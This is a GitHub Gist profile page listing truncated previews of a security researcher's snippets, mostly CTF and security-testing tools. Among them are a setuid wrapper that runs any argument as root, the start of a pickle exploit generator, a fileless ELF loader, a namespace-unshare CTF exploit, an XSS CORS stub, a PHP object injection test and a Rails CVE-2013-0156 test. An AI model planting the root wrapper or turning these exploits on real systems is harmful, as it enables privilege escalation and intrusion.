Skip to content

Instantly share code, notes, and snippets.

View 0xBADCA7's full-sized avatar

netcat 0xBADCA7

70 followers · 149 following
  • United States
View GitHub Profile
@0xBADCA7
0xBADCA7 / setuid_execute.c
Last active August 29, 2015 14:25
SETUID wrapper for *nix systems
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
system(argv[1]);
@0xBADCA7
0xBADCA7 / ftp_lastmodified.sh
Created October 22, 2015 22:24
Get files last modified less than $days ago
#!/bin/bash
# Get files last modified less than $days ago
# Inspired by some scripts at http://goo.gl/QDY1BO
# - 0xBADCA7
# Login credentials
user='anonymous' #Do not forget to enclose inside single or double quotes
pass='anon@ymo.us'
directory='/usr'
@0xBADCA7
0xBADCA7 / stats.py
Created October 22, 2015 23:53
Basic summary for malware site stats
# Invoke as:
# > cat sites.txt | python stats.py
#
#!/usr/bin/env python3
import fileinput, re
clean, superclean, blacklisted, malware = 0, 0, 0, 0
@0xBADCA7
0xBADCA7 / latency.txt
Created November 8, 2015 13:49 — forked from jboner/latency.txt
Latency Numbers Every Programmer Should Know
Latency Comparison Numbers
--------------------------
L1 cache reference 0.5 ns
Branch mispredict 5 ns
L2 cache reference 7 ns 14x L1 cache
Mutex lock/unlock 25 ns
Main memory reference 100 ns 20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy 3,000 ns
Send 1K bytes over 1 Gbps network 10,000 ns 0.01 ms
Read 4K randomly from SSD* 150,000 ns 0.15 ms
@0xBADCA7
0xBADCA7 / pickle_exploit_generator.py
Last active August 1, 2022 02:08
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run:
@0xBADCA7
0xBADCA7 / nodisk.c
Created December 15, 2015 10:37
Load an ELF without touching the disk
#define _GNU_SOURCE
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
@0xBADCA7
0xBADCA7 / unshare.c
Created December 30, 2015 09:26 — forked from stephenR/doit.sh
32c3_vault_exploit.c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sched.h>
#include <sys/mount.h>
int main(int argc, char *argv[])
{
if(unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
@0xBADCA7
0xBADCA7 / cors_http_reply.txt
Created December 31, 2015 00:00
A stub for HTTP 200 reply with CORS headers. Useful for piping into netcat when XSS'ing. One reply is for the OPTIONS request.
HTTP/1.1 200 OK
Server: MSLC
Date: Sun, 28 Dec 2015 08:50:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Status: 200 OK
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
@0xBADCA7
0xBADCA7 / object_injection_test.php
Created January 2, 2016 19:21
PHP object injection in 32c3 MonkeyBASE
<?php
$stream_context = array (
'http' => array (
'follow_location' => FALSE
) );
Class VISUALIZER{
public $url;
public $context;
public $host;
@0xBADCA7
0xBADCA7 / yml_security_test.rb
Created January 15, 2016 11:48 — forked from jmccaffrey/yml_security_test.rb
Simple Rails security test for CVE-2013-0156
#you can copy this into IRB or just run it as a file
require "net/http"
require "uri"
# require "net/https" # for testing ssl
url = "http://localhost:3000/login"
yaml = %{ --- !ruby/object:Time {} }
xml = %{<?xml version="1.0" encoding="UTF-8"?><foo type="yaml">#{yaml}</foo>}.strip